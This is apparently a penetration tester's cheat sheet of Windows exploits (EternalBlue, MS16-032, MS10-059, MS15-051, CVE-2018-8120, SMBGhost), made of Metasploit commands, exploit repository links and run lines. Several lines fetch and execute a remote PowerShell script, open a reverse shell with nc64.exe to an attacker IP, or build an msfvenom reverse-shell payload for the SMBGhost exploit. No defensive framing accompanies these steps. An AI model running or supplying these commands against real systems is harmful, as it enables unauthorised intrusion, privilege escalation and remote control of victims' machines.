# windows exploits ## MS08-067 Exploit * * ## MS-17-010 EternalBlue Exploit * msf: * checker: `use auxiliary/scanner/smb/smb_ms17_010` * exploit: `use exploit/windows/sbm/ms17_010_eternalblue` * [eternalblue\_manual\_exploit](https://root4loot.com/post/eternalblue_manual_exploit/) * no pipes needed | manual method * [helviojunior/MS17-010.git](https://github.com/helviojunior/MS17-010.git) * update username as guest / anonymous (if needed) * `python send_and_execute.py TARGET_IP SHELL.exe` * [3ndG4me/AutoBlue-MS17-010](https://github.com/3ndG4me/AutoBlue-MS17-010) * ensure to run pre requisites * `python zzz_exploit.py TARGET_IP` * [exploit-db/42315](https://www.exploit-db.com/exploits/42315) ## MS-16-032 Exploit * [EmpireProject/Invoke-MS16032.ps1](https://github.com/EmpireProject/Empire/blob/master/data/module_source/privesc/Invoke-MS16032.ps1) * `Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('shell.ps1')"` ## Windows 7 * MS11-046 | CVE-2011-1249 | win7 6.1.7600 N/A Build 7600 x86 * [abatchy17/MS11-046](https://github.com/abatchy17/WindowsExploits/tree/master/MS11-046) * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## MS09-050 'srv2.sys' SMB Code Execution (Python) * [exploit-db/40280](https://www.exploit-db.com/exploits/40280) ## MS09-002 Memory Corruption IE7 Exploit * msf: `use windows/browser/ms09_002_memory_corruption` ## Windows Server 2008 R2 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) ## Windows 7 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) ## Windows Server 2008 SP1 * CVE-2018-8120 * Description: vuln when Win32k component fails to properly handle objects in memory; can run arbitrary code in kernel mode * [SecWiki/CVE-2018-8120](https://github.com/SecWiki/windows-kernel-exploits/tree/master/CVE-2018-8120) * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows Server 2003 * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows Server 2012 R2 Standard * MS16-098 | CVE-2016-3309 | Server 2012 R2 Standard 6.3.9600 N/A Build 9600 * [SecWiki/MS16-098](https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098) ## Windows Server 2008 R2 * MS15-05 * [SecWiki/MS15-051/MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip) * `ms15-051.exe "nc64.exe -c cmd.exe IP PORT"` * MS10-059 | CVE-2010-2554 | win7 6.1.7600 N/A Build 7600 x86 * [egre55/MS10-059:%20Chimichurri/Compiled](https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059:%20Chimichurri/Compiled) * `MS10-059.exe KALI_IP PORT` ## Windows XP SP1 * Local PE using Windows Services (upnphost and SSDPSRV) * ## CVE-2020-0796 | smbhghost **REQUIREMENTS:** * needs smb port:445 open ### Steps: 1. [danigargu/CVE-2020-0796](https://github.com/danigargu/CVE-2020-0796) 2. Generate shellcode using `msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f dll -f csharp` 3. Update shellcode on line 204 file: `exploit.cpp` 4. Set TARGET\_ARCH and set for RELEASE 5. Build solution 6. Run `cve-2020-0796-local.exe`